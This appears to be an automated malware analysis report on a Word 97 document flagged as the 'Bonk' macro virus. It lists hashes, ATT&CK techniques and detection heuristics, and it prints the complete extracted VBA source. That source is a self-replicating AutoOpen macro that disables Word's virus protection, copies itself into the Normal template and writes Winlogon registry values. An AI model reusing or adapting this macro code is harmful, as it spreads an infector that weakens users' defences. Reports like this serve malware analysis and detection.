Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4570a67df077e4fa…

MALICIOUS

Office (OLE)

31.0 KB Created: 1999-04-13 07:50:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 0f6964dc529938d2806f38695efa46da SHA-1: e4d441fda9fe8fdfaad236b716f173f6aa01551c SHA-256: 4570a67df077e4fad6f2a32f0c6ee5caa0d323a15a13c036ee3084e1d20e3379
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, identified by the 'OLE_VBA_AUTOOPEN' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics. This macro attempts to export itself to 'c:\win32bonk.sys' and then conditionally imports it into the Normal template or the active document. It also modifies the LegalNoticeCaption and LegalNoticeText registry values under Winlogon, likely to display a custom message on system startup. The ClamAV detection 'Doc.Trojan.Bonk-1' further supports its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Bonk-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bonk-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1339 bytes
SHA-256: a47d0f32ead3562b6924b2237944daca7f07bde64f92fd2295557f954cdb82b1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BoNK"
Sub auTOOPen()
On Error Resume Next
z$ = "c:\win32bonk.sys"
bo = "BoNK"
Application.DisplayAlerts = wdAlertsNone
Options.VirusProtection = False: Options.SaveNormalPrompt = False
Application.VBE.ActiveVBProject.VBComponents(bo).Export z$
Set ad = ActiveDocument.VBProject.VBComponents
Set nt = NormalTemplate.VBProject.VBComponents
ai = 0
ni = 0
For x = 1 To ad.Count
    If ad(x).Name = bo Then ai = -1
Next x
For y = 1 To nt.Count
    If nt(y).Name = bo Then ni = -1
Next y
If ni = 0 And ai = -1 Then nt.import z$: NormalTemplate.Save
If ni = -1 And ai = 0 Then ad.import z$: ActiveDocument.Save
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeCaption") = "-=[WM97.BoNK]=-"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon", "LegalNoticeText") = "| This is WM97.BoNK of the .BoNK-family by Jack Twoflower -=[LzØ]=- |"
End Sub
Sub ExtrasMakro()
End Sub
Sub AnsichtVBCode()
End Sub
Sub AnsichtCode()
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.